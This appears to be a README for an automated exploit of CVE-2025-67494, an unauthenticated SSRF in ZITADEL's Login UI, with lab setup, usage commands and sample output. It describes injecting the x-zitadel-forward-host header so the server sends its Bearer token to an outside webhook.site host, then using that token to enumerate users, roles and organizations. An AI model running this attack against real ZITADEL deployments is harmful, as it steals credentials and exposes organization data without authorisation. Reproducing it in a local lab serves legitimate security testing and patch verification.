Share
## https://sploitus.com/exploit?id=7F74B76F-E8D6-55FA-A4A7-4AD803A7E554
# ZITADEL SSRF Exploit - CVE-2025-67494

Automated exploit for CVE-2025-67494 that performs SSRF exploitation and automatically retrieves the leaked Bearer token to query the ZITADEL Management API.

## Vulnerability

- **CVE**: CVE-2025-67494
- **CVSS**: 9.3 (Critical)
- **Type**: Unauthenticated Full-Read SSRF
- **Affected Versions**: ZITADEL v4.0.0-rc.1 through 4.7.0
- **Fixed Version**: >= 4.7.1

## Description

ZITADEL Login UI (V2) was vulnerable to service URL manipulation via the `x-zitadel-forward-host` header. The URL resolution logic treated this header as a trusted fallback, allowing an unauthenticated attacker to force the server to make HTTP requests to arbitrary domains, including internal addresses.

**Critical Impact**: The vulnerability also leaks Bearer authentication tokens in SSRF requests.

## Setup

### Start the Lab

```bash
docker compose up -d
```

Wait a few seconds for ZITADEL to fully start.

### Services

- **ZITADEL API** (port 28080): ZITADEL 4.7.0 (vulnerable version < 4.7.1)
- **ZITADEL Login UI** (port 29000): Login interface V2

## Installation

### Using uv (Recommended)

```bash
uv sync
```

This will create a virtual environment and install all dependencies.

### Using pip

```bash
pip install requests pwntools
```

## Usage

### Basic Usage

```bash
uv run python exploit.py -u http://localhost:29000
```

Or with pip:

```bash
python3 exploit.py -u http://localhost:29000
```

### With API URL

```bash
uv run python exploit.py -u http://localhost:29000 -a http://localhost:28080
```

### Options

- `-u, --ui-url`: ZITADEL Login UI URL (required)
- `-a, --api-url`: ZITADEL Management API URL (optional, auto-detected if not provided)
- `--timeout`: Timeout in seconds for webhook polling (default: 60)

## Example Output

```bash
$ uv run python exploit.py -u http://localhost:29000

[*] Starting CVE-2025-67494 exploit
[*] UI URL: http://localhost:29000, API URL: http://localhost:28080
[*] Creating webhook.site URL via API...
[+] Webhook created: https://webhook.site/c7c8ef1b-4b00-410f-90af-79fe3eb6c821
[*] OOB host: c7c8ef1b-4b00-410f-90af-79fe3eb6c821.webhook.site
[*] Sending SSRF request...
[*] Exploiting SSRF to http://localhost:29000
[*] OOB host: c7c8ef1b-4b00-410f-90af-79fe3eb6c821.webhook.site
[+] SSRF request sent (status: 200)
[*] Polling webhook for Bearer token (timeout: 30s)...
[*] Webhook received 1 request(s)...
[+] Bearer token successfully retrieved!
[*] Token: XeA8UY8C8Jc6kWcx509KXJhfUP6CQ2N6uXvUoruOwbtV9YzNKp...
[*] Retrieving information via Management API...
[*] 
    ============================================================
[*] IAM Information
[*] ============================================================
[*] Global Org ID: 350420171829100547
    IAM Project ID: 350420171829166083
    Default Org ID: 350420171829100547
[*] 
    ============================================================
[*] Organization Information
[*] ============================================================
[*] ID: 350420171829100547
    Name: ZITADEL
    State: ORG_STATE_ACTIVE
    Primary Domain: zitadel.localhost
[*] 
    ============================================================
[*] Users
[*] ============================================================
[*] Machine: login-client - USER_STATE_ACTIVE
    Human: zitadel-admin@zitadel.localhost (zitadel-admin@zitadel.localhost) - USER_STATE_ACTIVE
[*] 
    ============================================================
[*] User Memberships (User ID: 350420171829690371)
[*] ============================================================
[*] IAM: ZITADEL - Roles: IAM_LOGIN_CLIENT
[*] 
    ============================================================
[*] Projects
[*] ============================================================
[*] ZITADEL (ID: 350420171829166083) - PROJECT_STATE_ACTIVE
[*] 
    ============================================================
[*] Organization Members
[*] ============================================================
[*] zitadel-admin@zitadel.localhost - Roles: ORG_OWNER
[*] 
    ============================================================
[*] Organization Domains
[*] ============================================================
[*] zitadel.localhost - Verified Primary
[+] Exploitation completed successfully!
```

## How It Works

1. **Webhook Creation**: Automatically creates a webhook.site URL via API for OOB interaction
2. **SSRF Exploitation**: Sends a GET request to `/ui/v2/login` with the `x-zitadel-forward-host` header
3. **Token Extraction**: Polls webhook.site to retrieve the leaked Bearer token from the SSRF request
4. **API Enumeration**: Uses the token to query various Management API endpoints:
   - IAM information
   - Organization details
   - Users list
   - User memberships and roles
   - Projects
   - Organization members
   - Organization domains

## Output

The exploit will display:

- Bearer token (truncated)
- IAM information (global org ID, IAM project ID, default org ID)
- Organization information
- Users list with details
- User memberships and roles (ORG_OWNER, IAM_OWNER, etc.)
- Projects list
- Organization members
- Organization domains

## Requirements

- Python 3.8+
- `uv` (recommended) or `pip`
- Dependencies: `requests`, `pwntools`

## Notes

- The exploit uses webhook.site for OOB interaction (no local server needed)
- The API URL is auto-detected from the UI URL if not provided (assumes port 28080)
- The exploit automatically handles webhook creation, token extraction, and API queries